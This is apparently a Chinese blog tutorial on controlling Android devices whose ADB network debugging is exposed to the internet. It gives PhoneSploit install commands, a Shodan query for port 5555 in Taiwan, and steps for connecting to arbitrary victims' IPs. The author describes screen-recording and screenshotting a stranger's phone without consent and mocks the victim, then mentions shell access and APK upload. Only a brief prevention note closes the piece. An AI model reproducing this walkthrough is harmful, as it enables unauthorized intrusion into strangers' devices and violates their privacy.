利用usb网络调试控制安卓设备

宇道孜 2020年07月05日 159次浏览

此教程仅供学习,请勿用于非法

概述:

当大多数安卓开启usb调试会默认开启usb网络调试,这会把你的安卓设备暴露在公网上,本文将演示如何使用Shodan扫描暴露在网络上的Adb(Android Debug Bridge)并控制安卓设备。

一、准备阶段:

安全工具:phonesploit
搜索引擎:shodan
需要条件:安卓开启usb网络调试

注:大多数安卓手机开启usb调试时会默认开启usb网络调试

二、下载工具:

我使用的是kali linux系统,以下为linux中phonesploit安装代码

git clone https://github.com/Zucccs/PhoneSploit
cd PhoneSploit
pip install colorama
python2 main_linux.py

注:运行pip install colorama时,可能会遇到依赖问题
所以,需要使用命令先安装pip,再安装colorama
python2:sudo apt install python-pip
python3:sudo apt install python3-pip

安装完成进入后你将看到以下画面:
phonesploit启动

三、利用阶段:

使用shodan搜索:

"Android Debug Bridge" "Device" port:5555 country:"TW"

如下,搜索台湾网络上的安卓设备
暴露上公网的台湾安卓设备
接下来,随便选择一个IP粘贴后回车进行连接,连接成功结果如下:
连接安卓设备成功

注:有的设备没有在线,会连接失败,多尝试其他ip

phonesploit功能如下:
phonesploit功能(英文)
phonesploit功能(中文)
我这里选择第 [6] Screen record a phone 进行录制手机测试:
提示代码phonesploit(main_menu) > 时,输入数字 6

提示代码[+]Enter where you would like the screenshot to be saved.[Default: present working directory]
└──>phonesploit(screenshot) > 时,敲击回车默认保存在工具目录下
phonesploit默认保存时
这时文件已经保存在了phonesploit目录下

注:我之前尝试了很多次都保存失败了,那是因为phonesploit没有在root下运行,再测试输入7 进行屏幕截图抓取

截图安卓设备
这人搁这在看电视呢,丝毫不知道我已经控制了他的安卓设备。

除了能截图,还可以shell安卓设备、录制视频、上传apk等等.....
既然公网能利用usb网络调试控制安卓,那内网也应该能利用并控制,这个我没有测试。

如何防范:

这次能控制安卓设备最主要的原因是开启了usb网络调试,据我所知,大多数安卓开启usb调试会默认开启usb网络调试,这会把你的安卓设备暴露在公网上。usb网络调试需要通过adb命令关闭(略微麻烦),所以在不用usb调试时关闭它,这样你的安卓设备就安全了许多。